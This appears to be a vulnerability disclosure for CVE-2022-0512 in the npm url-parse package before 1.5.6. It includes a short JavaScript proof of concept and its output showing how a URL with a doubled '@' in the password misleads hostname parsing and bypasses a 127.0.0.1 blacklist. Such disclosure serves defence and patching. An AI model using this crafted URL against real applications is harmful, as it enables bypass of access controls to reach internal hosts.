Headline
CVE-2022-0512: Authorization Bypass Through User-Controlled Key in url-parse
Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.
Description
url-parse improperly handles the username and password portion of a URL and, as a result, fails to detect the hostname correctly.
Proof of Concept
url-parse is not able to correctly separate basic-authentication credentials from the host, so it reports the wrong hostname. This allows an application's hostname validation to be bypassed.
Suppose the username is admin, the password is password123@ (note the trailing @), and the hostname is 127.0.0.1, so the URL is http://admin:password123@@127.0.0.1.
Suppose further that the application has a blacklist check for the domain 127.0.0.1, so that every request to 127.0.0.1 is meant to be blocked.
Now parse the URL with url-parse:
// PoC.js
// Parse the crafted URL with url-parse (vulnerable prior to 1.5.6) and print the result
var parse = require('url-parse')
var cc = parse("http://admin:password123@@127.0.0.1")
console.log(cc)
Result:
{ slashes: true,
protocol: 'http:',
hash: '',
query: '',
pathname: '/',
auth: 'admin:password123',
host: '@127.0.0.1',
port: '',
hostname: '@127.0.0.1',
password: 'password123',
username: 'admin',
origin: 'http://@127.0.0.1',
href: 'http://admin:password123@@127.0.0.1/' }
Here you can see that auth, origin, password and hostname are all detected incorrectly.
A hostname check on cc.hostname sees @127.0.0.1, and cc.origin is http://@127.0.0.1, so neither matches the 127.0.0.1 blacklist entry above and the check is bypassed.
However, if cc.href is then used to fetch the URL, the request actually goes to 127.0.0.1.
Impact
Bypass hostname check